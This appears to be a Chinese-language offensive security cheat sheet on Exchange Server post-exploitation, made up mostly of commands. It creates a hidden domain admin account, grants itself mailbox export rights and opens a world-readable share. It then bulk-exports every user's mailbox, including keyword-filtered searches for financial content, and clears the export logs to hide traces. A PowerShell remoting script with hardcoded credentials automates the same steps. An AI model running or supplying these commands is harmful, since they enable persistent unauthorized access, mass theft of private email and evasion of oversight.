文章目录
其他命令
#提升 ‘scarlet’ 用户为域管权限 and 加入 Organization Management 组
net user scarlet 123456 /add
net group "domain admins" scarlet /add
net group "Organization Management" scarlet /add
#获取所有用户的邮件地址并导出到all-email.csv
Get-Mailbox -ResultSize Unlimited |select displayname,PrimarySmtpAddress |Export-Csv -Encoding utf8 c:\temp\all-email.csv -NoTypeInformation
#查看导出状态
Get-MailboxExportRequest
#查看exchange给用户分的组
Get-DistributionGroup
#查看IT Security组的详细信息
Get-DistributionGroup "IT Security" | fl
#获取组中的成员信息
Get-DistributionGroupMember -Identity "IT Security"
#获取admin用户的邮箱细节信息
get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime
操作实现
查看组织内已创建的管理角色
Get-ManagementRole
Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName
给administrator添加邮件的导入导出权限
结束后需要重启EMS
#新建一个 Exchange 角色组并将其添加到 Mailbox Import Export 管理角色中
New-RoleGroup -Name "Enterprise Mail Support" -Roles "Mailbox Import Export" -Members administrator -Description "Import Export_Enterprise Support"
#给一个已经存在的名为Import Export_Domain Admins的组添加用户
New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"
创建共享文件夹
net share test$=c:\temp\PST /GRANT:Everyone,FULL
邮件的导出
#将user1收件箱的所有邮件导出
Inbox(收件箱)、SentItems(已发送邮件)、DeletedItems(已删除邮件)、Drafts(草稿)
New-MailboxExportRequest -Mailbox user1 -IncludeFolders "#Inbox#" -FilePath "\\hostname\test$\test.pst"
#导出用户 Tony 在 2012 年 1 月 1 日之后收到的邮件正文中包含“company”和“profit”的邮件。
New-MailboxExportRequest -Mailbox Tony `-ContentFilter {(body -like "*company*") `-and (body -like "*profit*") `-and (Received -gt "01/01/2012")} `-FilePath "\\hostname\test$\test.pst"
#导出all-email.csv中所有用户的邮件
$mail = import-csv -path "all-email.csv"
foreach ($user in $mail){
$Alias = $user.displayname
New-MailboxExportRequest -Mailbox $Alias -FilePath "\\hostname\test$\test.pst"
}
痕迹清理
Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false
powershell实现
需要知道高权限用户的凭据或者自己创建一个用户加入Organization Management
组。
$pass = ConvertTo-SecureString "!QAZ2wsx" -AsPlainText -Force
# 用户名即使没创建邮箱,也应写邮箱地址全称,如:scarlet@test.com
$Credential = New-Object System.Management.Automation.PSCredential ("scarlet@test.com", $pass)
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri "http://exchange01.test.com/PowerShell/" -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -DisableNameChecking
# 获取所有用户邮件地址
# Get-Mailbox -ResultSize Unlimited |select displayname,PrimarySmtpAddress
# 添加导入导出角色
# New-RoleGroup –Name "Enterprise Mail Support" -Roles "Mailbox Import Export" -Members scarlet -Description "Import Export_Enterprise Support"
# 按收发时间导出邮件,用户名在 all-email.csv 文件 'displayname' 列
<#
$mail = import-csv -path "c:programdataall-email.csv"
foreach ($user in $mail){
$Alias = $user.displayname
New-MailboxExportRequest -ContentFilter {((Sent -gt '07/15/2019 0:00:00') -and (Sent -lt '07/31/2019 23:59:59')) -or ((Received -gt '07/15/2019 0:00:00') -and (Received -lt '07/31/2019 23:59:59'))} -Mailbox $Alias -FilePath "\exchange01test$$Alias.pst"
}
#>
# 清除已完成请求
# Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest
Remove-PSSession $Session
参考文章
【技术分享】域渗透之Exchange Server
[域渗透]Exchange邮件导出